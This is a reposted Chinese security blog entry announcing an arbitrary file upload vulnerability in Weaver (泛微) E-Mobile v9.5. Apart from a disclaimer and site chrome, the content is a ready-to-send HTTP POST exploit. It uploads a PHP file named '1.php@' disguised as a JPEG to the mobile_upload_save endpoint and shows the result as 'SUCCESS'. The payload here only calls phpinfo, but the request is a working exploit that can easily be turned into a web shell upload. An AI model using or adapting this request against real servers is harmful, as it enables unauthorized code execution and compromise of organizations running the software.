漏洞速递 | 泛微E-Mobile任意文件上传漏洞(附EXP)

admin 2023年6月2日09:01:30评论367 views字数 1135阅读3分47秒阅读模式

免责声明

请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。

泛微E-mobile v9.5任意文件上传漏洞

POST /E-mobile/App/Ajax/ajax.php?action=mobile_upload_save  HTTP/1.1Host: xx:8088Content-Length: 338Cache-Control: max-age=0Upgrade-Insecure-Requests: 1Origin: nullContent-Type: multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6ttUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7Connection: close
------WebKitFormBoundarydRVCGWq4Cx3Sq6ttContent-Disposition: form-data; name="upload_quwan"; filename="1.php@"Content-Type: image/jpeg
<?php phpinfo();?>------WebKitFormBoundarydRVCGWq4Cx3Sq6ttContent-Disposition: form-data; name="file"; filename=""Content-Type: application/octet-stream

------WebKitFormBoundarydRVCGWq4Cx3Sq6tt--


漏洞速递 | 泛微E-Mobile任意文件上传漏洞(附EXP)

SUCCESS

漏洞速递 | 泛微E-Mobile任意文件上传漏洞(附EXP)

文章来源:利刃信安攻防实验室

觉得内容不错,就点下在看
如侵权请私聊公众号删文

原文始发于微信公众号(EchoSec):漏洞速递 | 泛微E-Mobile任意文件上传漏洞(附EXP)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年6月2日09:01:30
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   漏洞速递 | 泛微E-Mobile任意文件上传漏洞(附EXP)https://cn-sec.com/archives/1778019.html

发表评论

匿名网友 填写信息